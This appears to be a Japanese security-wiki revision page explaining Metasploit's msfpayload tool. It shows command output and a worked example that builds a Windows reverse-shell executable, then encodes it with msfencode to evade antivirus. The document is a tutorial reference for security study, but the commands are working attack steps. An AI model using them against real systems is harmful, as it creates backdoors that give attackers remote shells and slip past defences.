「msfpayload」の版間の差分
提供: セキュリティ
(ページの作成:「Metasploitのmsfpayload (MSF Payload)とは、Frameworkを使用せずにエクスプロイトのシェルコードや実行ファイルを作成でき...」) |
|||
行1: | 行1: | ||
− | [[Metasploit]]の[[msfpayload]] (MSF Payload)とは、Frameworkを使用せずに[[エクスプロイト]]の[[シェルコード]]や実行ファイルを作成できます。 | + | [[Metasploit]]の[[msfpayload]] (MSF Payload)とは、Frameworkを使用せずに[[エクスプロイト]]の[[シェルコード]]や実行ファイルを作成できます。[[msfpayload]]は、[[msfvenom]]に置き換えられました。 |
'''読み方''' | '''読み方''' | ||
行68: | 行68: | ||
[[msfencode]]の詳細については、[[msfencode]]をご参照ください。 | [[msfencode]]の詳細については、[[msfencode]]をご参照ください。 | ||
== 関連項目 == | == 関連項目 == | ||
+ | * [[msfvenom]] | ||
* [[Metasploit]] | * [[Metasploit]] | ||
* [[msfencode]] | * [[msfencode]] |
2016年4月23日 (土) 11:38時点における最新版
Metasploitのmsfpayload (MSF Payload)とは、Frameworkを使用せずにエクスプロイトのシェルコードや実行ファイルを作成できます。msfpayloadは、msfvenomに置き換えられました。
読み方
- msfpayload
- えむえすえふ ぺいろーど
概要
シェルコードは、C言語、Ruby、JavaScript、VBA などのフォーマットで生成できます。
使い方
コマンドラインオプション
root@kali:~# msfpayload -h Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]> OPTIONS: -h Help banner -l List available payloads
モジュールのオプションの調べ方
モジュールのオプションの調べるには、 O を使用します。
root@kali:~# msfpayload windows/shell_reverse_tcp O Name: Windows Command Shell, Reverse TCP Inline Module: payload/windows/shell_reverse_tcp Platform: Windows Arch: x86 Needs Admin: No Total size: 314 Rank: Normal Provided by: vlad902 <vlad902@gmail.com> sf <stephen_fewer@harmonysecurity.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Description: Connect back to attacker and spawn a command shell
実行ファイルの作り方
Windows用の実行ファイルを作る場合は、 msfpayloadにXを指定します。
root@kali:~# msfpayload windows/shell_reverse_tcp LHOST=191.168.1.1 X > test_payload.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/shell_reverse_tcp Length: 314 Options: {"LHOST"=>"191.168.1.1"} root@kali:~# file test_payload.exe test_payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows
ウイルス対策ソフトに検知されないために
msfpayloadで作成したファイルは、ウイルス対策ソフトに検知されてしまうかもしれません。 そういった場合には、msfencodeで検出されないように変換を行います。
root@kali:~# msfpayload windows/shell_reverse_tcp LHOST=191.168.1.1 X | msfencode -e x86/shikata_ga_nai -t exe > test_payload2.exe
msfencodeの詳細については、msfencodeをご参照ください。